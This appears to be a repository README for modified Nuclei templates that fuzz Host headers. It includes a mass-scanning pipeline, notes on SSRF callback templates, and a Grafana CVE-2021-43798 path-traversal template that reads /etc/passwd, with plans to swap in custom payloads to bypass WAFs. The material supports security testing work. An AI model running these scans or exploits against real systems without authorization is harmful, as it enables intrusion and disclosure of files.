Modified Nuclei Templates Version to FUZZ Host Header
Requirements
1 - Understand Virtual Host
Virtual Host refers to run more than one web site on a single IP
e.g. You can configure Nginx to run two web site e.g. dev.example.com and api.example.com like that
server {
listen 80;
listen [::]:80;
root /var/www/dev/html;
index index.html;
server_name dev.example.com;
location / {
try_files $uri $uri/ =404;
}
}server {
listen 443 ssl;
listen [::]:443 ssl;
ssl on;
ssl_certificate /path/your.crt;
ssl_trusted_certificate /path/your.crt;
ssl_certificate_key /path/your.key;
root /var/www/api/html;
index index.html;
server_name api.example.com;
location / {
try_files $uri $uri/ =404;
}
}2 - Install
3 - Clone this Repository
Usage
cat subdomains.txt | dnsx -a -silent -retry 5 -resp -o scanning.txtcat scanning.txt | tr -d '[]' | awk '{ print $2 }' | sort -u | tee -a ips.txtcat ips.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o aliveIPS.txtcat scanning.txt | awk '{ print $1 }' | sort -u | tee -a resolvableDomains.txtcat resolvableDomains.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o websites.txtcat websites.txt | sed 's|^https://||' | sed 's|^http://||' | tee aliveSUBDOMAINS.txtcat resolvableDomains.txt | anew aliveSUBDOMAINS.txt -d | tee -a deadSUBDOMAINS.txtsed -i -- 's|/home/mahmoud/Wordlist/AllSubdomains.txt|/path/deadSUBDOMAINS.txt|' *.yamlnuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/CVE/" -severity high -o bugs.txtKeep in Your Mind
If You gonna Use SSRF Templates , You must Use Your DOMAIN e.g.
nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/SSRF/*.yaml" -var "MY-DOMAIN=me.com"To Minimize Number of ERRORS , Prefer Using FOR LOOP e.g.
for ip in `cat aliveIPS.txt`
do
nuclei -u $ip -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/" -severity high -o bugs.txt
done
Tips
if U are Nuclei's Templates Contributer , write Your Templates by using HTTP raw format to MAKE THIS REPOSITORY UPDATE e.g.
id:
info:
name:
author:
severity:
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
-
- type: word
words:
- ""
- ""
condition: and
- type: word
part: header
words:
- ""Planning
I'm Trying to modify Nuclei's Templates to become MORE Powerful e.g. CVE-2021-43798
id: CVE-2021-43798
info:
name:
author:
severity:
requests:
- method: GET
path:
- "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200I'm gonna Replace ../../../../../../../../../../../../../../../../../../../etc/passwd to {{FILE-unix}}
id: CVE-2021-43798
info:
name:
author:
severity:
requests:
- method: GET
path:
- "{{BaseURL}}/public/plugins/alertlist/{{FILE-unix}}"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200that will help to bypass WAFs by using Custom paylaods because I think all WAFs detect ../../etc/passwd so using ../../etc/passwd is gonna be useless but using Custom paylaods is gonna be useful
Help ME !
these days I'm trying to find junior web penetration testing position but it's must be Remotely Becuase I'm still Student so IF YOU CAN HELP ME , DM on TWITTER
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent